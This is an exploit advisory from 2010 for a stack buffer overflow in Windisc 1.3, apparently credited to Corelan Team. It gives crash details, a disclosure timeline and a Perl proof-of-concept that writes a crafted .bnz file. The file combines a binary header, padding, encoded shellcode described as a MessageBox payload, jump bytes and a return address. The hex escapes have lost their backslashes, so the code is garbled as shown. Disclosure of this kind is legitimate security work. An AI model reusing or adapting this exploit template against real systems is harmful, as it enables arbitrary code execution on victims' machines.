Windisc Stack Buffer Overflow Vulnerability
Posted on 17 March 2010
=========================================== Windisc Stack Buffer Overflow Vulnerability =========================================== 0x00 : Vulnerability information -------------------------------- [*] Product : Windisc [*] Version : 1.3 [*] Vendor : RParris [*] URL : http://math.exeter.edu/rparris/windisc.html [*] Platform : Windows [*] Type of vulnerability : Stack Buffer overflow [*] Risk rating : Medium [*] Issue fixed in version : Unknown [*] Vulnerability discovered by : Rick2600 [*] Corelan Team : http://www.corelan.be:8800/index.php/security/corelan-team-members/ 0x01 : Vendor description of software ------------------------------------- From the vendor website: Windisc is a collection of subprograms that deal with discrete-math topics such as apportionment, voting power, voting methods, and network analysis (traveling salesman problem, map-coloring, etc). 0x02 : Vulnerability details ---------------------------- In order to trigger the vulnerability a user needs to load a crafted Banzhaf (.bnz) file. EAX 00A193BC ECX 0000000B EDX 00A193BC EBX 00A16638 ESP 0012F778 ASCII "AAAAAAAAAAAAAAAAAA..." EBP 41414141 ESI 00A4D158 EDI 0000000C EIP 41414141 0x03 : Vendor communication --------------------------- [*] Feb 15 2010: Author contacted (no replies) [*] Mar 08 2010: Vulnerability disclosed 0x04 : Exploit/PoC ------------------ Note : you are not allowed to edit/modify this code. If you do, Corelan cannot be held responsible for any damages this may cause. print "|------------------------------------------------------------------| "; print "| __ __ | "; print "| _________ ________ / /___ _____ / /____ ____ _____ ___ | "; print "| / ___/ __ \/ ___/ _ \/ / __ `/ __ \ / __/ _ \/ __ `/ __ `__ \ | "; print "| / /__/ /_/ / / / __/ / /_/ / / / / / /_/ __/ /_/ / / / / / / | "; print "| \___/\____/_/ \___/_/\__,_/_/ /_/ \__/\___/\__,_/_/ /_/ /_/ | "; print "| | "; print "| http://www.corelan.be:8800 | "; print "| | "; print "|-------------------------------------------------[ EIP Hunters ]--| "; print "[+] PEAnut Discrete Math Package Exploit "; my $sploitfile="windisc_poc.bnz"; my $header= "x77x03x00x00x03x00x00x00x36x00x00x00x3bx00x00x00". "x50x03x00x00x3cx02x00x00x00x00x00x00x01x00x00x00". "x3dx00x00x00xd9xffxffxffx2cx01x00x00x64x00x00x00". "x64x00x00x00x00x00x00x00x00x00x00x00x0ax00x00x00". "x0fx00x00x00x2bxd0x28x01x49x1ex29x01x00x00x00x00". "x0cx00x00x00x0ax00x00x00x0ax00x00x00x08x00x00x00". "x0cx00x00x00x0ax00x00x00x0ax00x00x00x0ax00x00x00". "x0ax00x00x00x0ax00x00x00xf0xffxffxffx00x00x00x00". "x00x00x00x00x00x00x00x00x90x01x00x00x00x00x00x00". "x08x02x01x31x43x6fx75x72x69x65x72x20x4ex65x77x00". "x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00". "x00x00x00x00xf3xffxffxffx00x00x00x00x00x00x00x00". "x00x00x00x00x90x01x00x00x00x00x00x02x08x02x01x31". "x53x79x6dx62x6fx6cx00x20x4ex65x77x00x00x00x00x00". "x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00". "xf3xffxffxffx00x00x00x00x00x00x00x00x00x00x00x00". "x90x01x00x00x00x00x00x00x08x02x01x31x43x6fx75x72". "x69x65x72x20x4ex65x77x00x00x00x00x00x00x00x00x00". "x00x00x00x00x00x00x00x00x00x00x00x00xf5xffxffxff". "x00x00x00x00x00x00x00x00x00x00x00x00x90x01x00x00". "x00x00x00x00x08x02x01x31x43x6fx75x72x69x65x72x20". "x4ex65x77x00x00x00x00x00x00x00x00x00x00x00x00x00". "x00x00x00x00x00x00x00x00xf0xffxffxffx00x00x00x00". "x00x00x00x00x00x00x00x00x90x01x00x00x00x00x00x00". "x08x02x01x02x54x69x6dx65x73x00x72x20x4ex65x77x00". "x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00". "x00x00x00x00xf3xffxffxffx00x00x00x00x00x00x00x00". "x00x00x00x00x90x01x00x00x00x00x00x00x08x02x01x02". "x54x69x6dx65x73x00x72x20x4ex65x77x00x00x00x00x00". "x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00". "xf3xffxffxffx00x00x00x00x00x00x00x00x00x00x00x00". "x90x01x00x00x00x00x00x00x08x02x01x31x43x6fx75x72". "x69x65x72x20x4ex65x77x00x00x00x00x00x00x00x00x00". "x00x00x00x00x00x00x00x00x00x00x00x00xf3xffxffxff". "x00x00x00x00x00x00x00x00x00x00x00x00x90x01x00x00". "x00x00x00x00x08x02x01x31x43x6fx75x72x69x65x72x20". "x4ex65x77x00x00x00x00x00x00x00x00x00x00x00x00x00". "x00x00x00x00x00x00x00x00xf3xffxffxffx00x00x00x00". "x00x00x00x00x00x00x00x00x90x01x00x00x00x00x00x00". "x08x02x01x31x43x6fx75x72x69x65x72x20x4ex65x77x00". "x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00". "x00x00x00x00xf3xffxffxffx00x00x00x00x00x00x00x00". "x00x00x00x00x90x01x00x00x00x00x00x00x08x02x01x31". "x43x6fx75x72x69x65x72x20x4ex65x77x00x00x00x00x00". "x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00". "x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00". "x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00". "x00x00x00x00x00x00x00x00x24xf9x12x00x91x74x49x00". "x1cx83x4bx00x00x00x00x00x00x24xf9x12x00x91x74x49". "x00x1cx83x4bx00x00x00x00x00x00x24xf9x12x00x91x74". "x49x00x1cx83x4bx00x00x00x00x00x00x24xf9x12x00x91". "x74x49x00x1cx83x4bx00x00x00x00x00x00x13x00x13x00". "x13x00x13x00x13x00x13x00x13x00x04x00x00x00x06x00". "x13x00x13x00x13x00x13x00x13x00x00x00x00x00xffxff". "xffx00xffx00xffx00xffxffx00x00xffx00x00x00x00xbf". "x3fx00x00x00xffx00x00x7fx7fx00xffx7fx00x00xffx00". "x7fx00xa0x2fx00x00x00xffxffx00xbfxbfx7fx00x7fx00". "x7fx00x20xffx00x00xffx7fx7fx00x87x87x00x00x00x3c". "xa0x00xe0xe0xe0x00xc0xc0xc0x00xa0xa0xa0x00x80x80". "x80x00x60x60x60x00x40x40x40x00xbfx00x3fx00x7exde". "xffx00xffxccxccx00xffx7exdex00xffxdex7ex00xdexff". "x7ex00x7exffxdex00xffxffxbfx00xffxbfxffx00xbfxff". "xffx00xffxffxdex00xffxdexffx00xdexffxffx00xb1xde". "xd4x00xb1xd4xdex00xd4xb1xdex00xd4xdexb1x00xdexb1". "xd4x00xdexd4xb1x00xbfxf1xdex00xbfxdexf1x00xdexf1". "xbfx00xdexbfxf1x00xf1xdexbfx00xf1xbfxdex00xffx96". "xeax00x96xeaxffx00xccxccxccx00xc8x70x00x00xdexcd". "x00x00xdex68x20x00x14x82x28x00xc0x00xa0x00xd4x28". "x28x00x50x84xb0x00x64xa0xc8x00x14x64x14x00x0cx00". "x00x00x07x00x00x00xffxffxffxffx01x00x00x00x00x00". "x00x00xffxffxffxffxffxffxffxffxb1x00x00x00x05x00". "x00x00x32x00x00x00x00x00x00x00x00x00x00x00x00x00". "x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00". "x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00". "x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00". "x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00". "x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00". "x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00". "x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00". "x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00". "x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00". "x00x00x00x00x00x00x0bx00x00x00x16x00x00x00x2fx00". "x00x00x24x00x00x00x1ex00x00x00x24x00x00x00x2dx00". "x00x00x20x00x00x00x23x00x00x00x11x00x00x00x1fx00". "x00x00x0bx00x00x00x07x00"; #MsgBox Corelan Team my $shellcode= "x2bxc9xdbxcaxb1x4bxd9x74x24xf4x5axbfxc8xac" . "x87x72x31x7ax16x83xeaxfcx03x7axdax4ex72x24" . "xebx4ex4cx12xb8x7fxcbx2fxbdxf4x53x3cx4ax4a" . "x40x6cx12xc0x6exdcxf4x5dx68x57x48x72x2bx8e" . "xdax72xd3x50xbaxf9xbfx74x1ex75x7ax49xd5xdd" . "x80xc9xe8x37x01x63xf2x4cx4cx54x03xb8x92xa3" . "x4axb5x61x47x4dx27xb8xa8x7cx77x47xfaxfaxb7" . "xccx09xc3xf7x20x0fx04xeexcaxf0x75x0ex17x73" . "xadxd9x1dx55x26x43xfax68xd3x12x89x67x68x50" . "xd7x6bx6fx8dx63x97xe4x50x9cx11xbex76x40x43" . "xfdxdax28xd1xe9x82x36x2ax16x45xcfx54x2cx5e" . "xd0x56xacxdex17x52xacxe0x97x62x62x95x71x57" . "x92x10x7ex58x62xe8x0dx3dx10x21xc0x93xb0x29" . "x48xecxd0x92x90xecx20x5dxdexe2xccx1fx07x18" . "x7fx08x84xddx7fxc8x43x7fx32x74x12x6cxc4x84" . "x15x6dx5dx61x9cxafxb4xb1x60xd0xb9x18x12x52" . "x41x2cxddx2cx88x26x1ex2fx0axdfx81xd0xf5xe0" . "x57x9bxf6xe0x57x1bx5dx1bx21x26xb4xebxcex58" . "xb9xb2x9dxf7x17xa3xe8x08x68xccxfcxe2x96x33" . "xffx57x7fx29xffx67x7fx17xcexb5x2dxf4x61x68" . "x2ex2axb0x4cx80x34xe6x44xc8x2dxf6xaaxf7xe2" . "x7ex3bx62x67x81x2bx8dx98x7ex54x0ex08xf3xce" . "xfcxb7x9dx30xa8x52x03x5cx70xedxb4xf0x15x69" . "x3bx07"; print "[+] Preparing payload "; my $payload = $header; $payload .= "A" x 300; $payload .= $shellcode; $payload .= "B" x (772 - length($shellcode)); $payload .= "xE9xB9xFCxFFxFF"; $payload .= "xEBxF9x90x90"; $payload .= pack("V", 0x00405437); print "[+] Writing payload to file "; open(FILE,">$sploitfile"); binmode (FILE); print FILE $payload; close(FILE); print "[+] Wrote ".length($payload)." bytes to file $sploitfile "; # ~ - [ [ : Inj3ct0r : ] ]
